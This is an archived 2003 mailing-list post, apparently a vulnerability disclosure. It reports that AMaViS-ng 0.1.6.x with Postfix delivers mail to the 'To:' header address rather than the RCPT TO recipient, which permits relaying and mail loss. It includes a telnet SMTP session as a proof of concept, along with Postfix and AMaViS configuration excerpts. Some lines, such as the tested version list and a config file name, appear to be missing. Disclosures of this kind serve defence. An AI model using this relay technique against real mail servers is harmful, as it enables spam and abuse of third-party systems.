AMaViS-ng 0.1.6.x and postfix: possible open relay and mail loss

From: Phil Cyc (ajEA3UMBepQ4MRExDmm0qbFeeQEJtffpg.1at_private)
Date: Mon Apr 07 2003 - 05:23:47 PDT

  • Next message: drG4njubas: "Orplex guestbook script injection."

    Hi everyone -
    with postfix using AMaViS-ng 0.1.6.x (tested: and; 0.1.4.x is 
    not vulnerable), all email gets forwarded to the address specified by the 
    "To:" header line, ignoring the real recipient given via "RCPT TO:".
    Possible exploit:
    #> telnet somemx.domain.tld 25
    (220 somemx.domain.tld ESMTP Postfix)
    helo amavis-ng
    (250 somemx.domain.tld)
    mail from:userXat_private
    (250 ok)
    rcpt to:userYat_private
    (250 ok)
    (354 End data with <CR><LF>.<CR><LF>)
    From: userXat_private
    To: userZat_private
    Subject: AMaViS-ng 0.1.6.x bug
    (250 Ok: queued as ...)
    (221 Bye)
    Requirements: The mx (somemx.domain.tld) having postfix and AMaViS-ng 0.1.6.x 
    installed must accept emails for userYat_private
    What does it to:
    userXat_private is sending an email to userYat_private The header of this 
    email contains "To: userZat_private". AMaViS-ng seems to parse the header 
    and forwards the email to userZat_private userYat_private does not get 
    this email.
    As many postfix users trust their localhost (no restrictions for localhost), 
    it is possible to relay an email or a spam mail this way.
    configuration files (relevant parts):
    # $postfix/
    smtp inet n - n - - smtpd -o content_filter=filter:
    filter unix - n n - - pipe
      flags=Rq user=mail argv=/usr/bin/amavis ${sender} -- ${recipient}
    # end of
    # $amavis-ng/amavis.conf
    mail-transfer-agent = Postfix
    postfix = /usr/sbin/sendmail
    args = -i -f
    # end of amavis.conf
    There is no problem with AMaViS == 0.1.4.x
    Kind regards,
    Phil Cyc

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